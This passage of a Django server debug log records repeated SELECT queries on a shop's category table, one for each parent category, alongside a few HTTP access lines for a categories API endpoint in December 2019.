"shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 11:08:35,457 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 11:08:35,460 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 11:08:35,463 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 11:08:35,466 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 11:08:35,470 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 11:08:35,473 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 11:08:35,478 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 11:08:35,481 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 11:08:35,484 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 11:08:35,488 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 11:08:35,492 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 11:08:35] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 11:09:26,890 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 11:09:26,897 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 11:09:26,900 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 11:09:26,902 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 11:09:26,905 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 11:09:26,907 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 11:09:26,910 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 11:09:26,912 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 11:09:26,914 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 11:09:26,917 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 11:09:26,919 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 11:09:26,922 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 11:09:26,924 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 11:09:26,926 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 11:09:26,929 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 11:09:26,932 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 11:09:26,934 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 11:09:26,936 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 11:09:26,938 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 11:09:26,941 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 11:09:26,944 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 11:09:26,946 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 11:09:26,948 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 11:09:26,950 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 11:09:26,952 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 11:09:26,955 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 11:09:26,958 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 11:09:26,960 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 11:09:26,962 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 11:09:26,964 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 11:09:26,967 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 11:09:26,969 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 11:09:26,972 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 11:09:26,974 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 11:09:26,976 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 11:09:26,979 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 11:09:26,982 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 11:09:26,984 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 11:09:26,986 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 11:09:26,988 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 11:09:26,990 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 11:09:26,993 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 11:09:26,995 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 11:09:26,997 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 11:09:27,000 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 11:09:27,002 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 11:09:27] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 11:10:05] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-19 11:10:44,287 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 11:10:44,293 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 11:10:44,297 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 11:10:44,300 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 11:10:44,304 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 11:10:44,306 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 11:10:44,309 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 11:10:44,311 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 11:10:44,313 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 11:10:44,317 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY 